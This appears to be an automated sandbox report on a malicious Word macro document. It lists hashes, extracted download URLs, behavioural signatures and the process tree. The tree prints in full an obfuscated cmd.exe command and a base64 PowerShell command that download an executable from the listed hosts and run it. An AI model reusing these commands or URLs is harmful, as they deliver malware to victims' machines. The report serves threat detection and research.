Analysis
-
max time kernel
129s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
07/05/2024, 08:40
General
-
Target
200f08297cc9faefc5ea695ba65e90a9_JaffaCakes118.doc
-
Size
89KB
-
MD5
200f08297cc9faefc5ea695ba65e90a9
-
SHA1
f971df29a33cdbdf65cb776bc947e1f28f6d6e5e
-
SHA256
c555b4b4df8721a2d969f375d8f5fa7deba2f76dc03f32de4c5b1a8515efb02b
-
SHA512
aca15b6f4d4a4fdf564e9457867241e5af3cb9656e148cbf2f4f1eaf7cc516f4bed6f0badfbf53651cf8c05ecdb098f200a6b3ab29a048a51c2c9890b8c47a6f
-
SSDEEP
1536:lptJlmrJpmxlRw99NBD/t+alqtmmFZ/tiwp613rvDaHwwle:bte2dw99fD/LqtmQVp6laT
Malware Config
Extracted
http://miafashionropadeportiva.com/y
http://terabuild.sevencolours.eu/4bc2kL
http://oztax-homepage.tonishdev.com/Lg4
http://vioprotection.com.co/u
http://test.helos.no/6GZ24w1
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 1 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\200f08297cc9faefc5ea695ba65e90a9_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /V^ ^ ^ /c " ^se^t ^ ^ ^ ^6^bv=AACA^g^A^AIAAC^A^gA^A^I^A^AC^A^g^AA^I^A^ACA^g^A^AI^A^ACA^g^AA^IAACA^gA^Qf^A0H^A7^BAaA^M^G^A0^B^QY^AMGA9^B^wOAs^G^AhBQZ^AIHA^i^Bw^OA^MF^AuB^g^YA^QC^A^g^A^Qb^A^UGA^0B^Q^S^A^0C^A^lB^w^aA^8GA2^B^g^bA^kEA7A^QKA^MF^A^uBg^YAQCAgA^ALA0E^AvB^QW^AQCAoA^QZA^w^GA^p^B^gR^A^QG^Ah^BwbAwG^Au^B^wdA8G^AEBg^LAo^G^A^U^BQ^WAQC^A^7^BQ^eAIHA^0Bw^eA^kC^AMBgQ^AM^E^A^kA^A^IA^4^GA^p^B^AI^A0^EAvBQW^AQC^Ao^AAaA^MG^A^h^BQZ^A^IHAvBgZ^A^s^DAnAQZAgHAlB^gLAcC^Ar^Ag^W^Ak^F^A^i^B^AJ^AsC^An^A^AXAcC^ArAwY^A^kGA^sB^g^YAU^HAwB^gOA^YHA^u^BQZA^QCA^9AwUA^4GAiBAJ^As^D^AnAAN^AI^D^A^yAwJ^AAC^A9A^AI^Ao^F^A^ZB^g^Y^AQC^A7A^QKAcC^A^A^B^wJAgC^A^0^B^QaA^wG^Aw^Bw^U^A4CAn^AQM^Ac^H^A0^A^gMAo^FA^H^BgN^A8C^AvBgb^A4CA^z^Bwb^Aw^G^AlBAaA4CA0^Bwc^AUGA0BwL^A^8C^A^6A^AcA^Q^H^A0BA^a^A^A^EA^1^Bw^LA^8G^Aj^B^gL^A^0GAv^Bw^YA4CAuBwbAkG^A^0^BwYA^U^GA^0^BwbAI^H^A^wB^wb^A^kGA2^Bw^LA^8C^A6^A^AcAQH^A^0BA^a^A^A^EA0^A^wZ^Aw^E^AvA^Q^b^A^8^GAjB^gLAYH^A^l^BAZ^A^gGAz^B^Qa^A4^G^Av^B^A^d^A4CA^lBwZAEG^AwB^Q^Z^A^0^G^Av^B^Aa^A0CA^4^B^QYAQ^HA6B^w^bA^8C^Av^A^g^O^AAH^A0B^A^d^A^gG^AABA^T^AsG^AyAw^YA^I^G^A0A^w^LAUHAlBgL^AMH^A^y^B^Q^dA^8^GA^s^B^wb^AMG^Au^B^Q^ZA^YH^A^lBwcA^4C^Ak^B^A^bA^kGA1B^gY^AEGAy^BQZAQHAv^A^wLA^oDA^wB^A^d^AQ^HA^oBA^Q^AkH^AvA^QbA8^GA^j^B^g^LAE^G^A^2^B^Qa^AQH^A^yBw^b^AAH^A^l^B^AZ^AEG^Aw^Bw^b^A^I^H^AuBwb^AkGA^o^Bwc^A^EG^A^mB^Q^Y^A^k^GA^t^B^wL^A^8C^A^6A^AcAQH^A0^B^A^a^AcCA9AATA^I^E^A^DBA^JAsDA^0Bgb^A^UG^ApBA^b^A^MEA^iB^QZ^Ac^FAu^AA^d^A^UGAO^BAIA^Q^HA^jB^Q^Z^AoGAiB^wbA0C^A^3^B^Q^Z^A^4^GA9A^g^aA^Q^FAZ^B^A^J^ ^e^- ^l^l^e^hsrew^o^p& ^f^Or /^L %^w ^in ( ^1^013^ ^ ^ -^1^ ^ ^ 0)^D^O s^e^t ^m^bS=!^m^bS!!^6^bv:~ %^w, 1!&^I^f %^w == ^0 C^A^lL %^m^bS:^*^mbS^!^=% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABZAFQAagA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABDAEIATAA9ACcAaAB0AHQAcAA6AC8ALwBtAGkAYQBmAGEAcwBoAGkAbwBuAHIAbwBwAGEAZABlAHAAbwByAHQAaQB2AGEALgBjAG8AbQAvAHkAQABoAHQAdABwADoALwAvAHQAZQByAGEAYgB1AGkAbABkAC4AcwBlAHYAZQBuAGMAbwBsAG8AdQByAHMALgBlAHUALwA0AGIAYwAyAGsATABAAGgAdAB0AHAAOgAvAC8AbwB6AHQAYQB4AC0AaABvAG0AZQBwAGEAZwBlAC4AdABvAG4AaQBzAGgAZABlAHYALgBjAG8AbQAvAEwAZwA0AEAAaAB0AHQAcAA6AC8ALwB2AGkAbwBwAHIAbwB0AGUAYwB0AGkAbwBuAC4AYwBvAG0ALgBjAG8ALwB1AEAAaAB0AHQAcAA6AC8ALwB0AGUAcwB0AC4AaABlAGwAbwBzAC4AbgBvAC8ANgBHAFoAMgA0AHcAMQAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAYgBZAFoAIAA9ACAAJwAyADIANAAnADsAJABiAG4AUwA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABiAFkAWgArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAWQBvAE0AIABpAG4AIAAkAEMAQgBMACkAewB0AHIAeQB7ACQAWQBUAGoALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAWQBvAE0ALAAgACQAYgBuAFMAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAYgBuAFMAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB